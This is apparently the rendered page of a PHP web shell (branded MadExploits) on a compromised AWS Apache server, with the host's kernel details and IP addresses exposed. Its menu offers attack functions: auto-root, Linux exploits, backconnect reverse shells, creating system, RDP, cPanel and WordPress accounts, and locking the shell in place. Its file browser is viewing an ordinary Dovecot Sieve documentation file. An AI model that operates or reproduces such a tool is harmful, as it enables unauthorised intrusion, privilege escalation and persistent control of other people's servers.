Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.145.42.128
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dovecot-core /
sieve /
extensions /
[ HOME SHELL ]
Name
Size
Permission
Action
duplicate.txt
1.68
KB
-rw-r--r--
editheader.txt
2.14
KB
-rw-r--r--
include.txt
1.08
KB
-rw-r--r--
spamtest-virustest.txt.gz
1.71
KB
-rw-r--r--
vacation.txt.gz
2.2
KB
-rw-r--r--
vnd.dovecot.environment.txt
1.46
KB
-rw-r--r--
vnd.dovecot.report.txt
2.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : duplicate.txt
Duplicate Extension Relevant specifications ======================= doc/rfc/duplicate.rfc7352.txt Description =========== The "duplicate" extension adds a new test command called "duplicate" to the Sieve language. This test adds the ability to detect duplications. The main application for this new test is handling duplicate deliveries commonly caused by mailing list subscriptions or redirected mail addresses. The detection is normally performed by matching the message ID to an internal list of message IDs from previously delivered messages. For more complex applications, the "duplicate" test can also use the content of a specific header field or other parts of the message. Refer to doc/rfc/duplicate.rfc7352.txt for a specification of the Sieve language extension. Previously, this extension was Dovecot-specific and available under the name "vnd.dovecot.duplicate". That implementation differs significantly from what is now published as an RFC, but for backwards compatibility the original extension is still supported. Configuration ============= The "duplicate" extension is available by default. The "duplicate" extension has its own specific settings. The following settings are available (default values are indicated): sieve_duplicate_default_period = 14d sieve_duplicate_max_period = 7d These options respectively specify the default and the maximum value for the period after which tracked values are purged from the duplicate tracking database. The period is specified in s(econds), unless followed by a d(ay), h(our) or m(inute) specifier character. Example ======= plugin { sieve = ~/.dovecot.sieve sieve_duplicate_default_period = 1h sieve_duplicate_max_period = 1d }
Close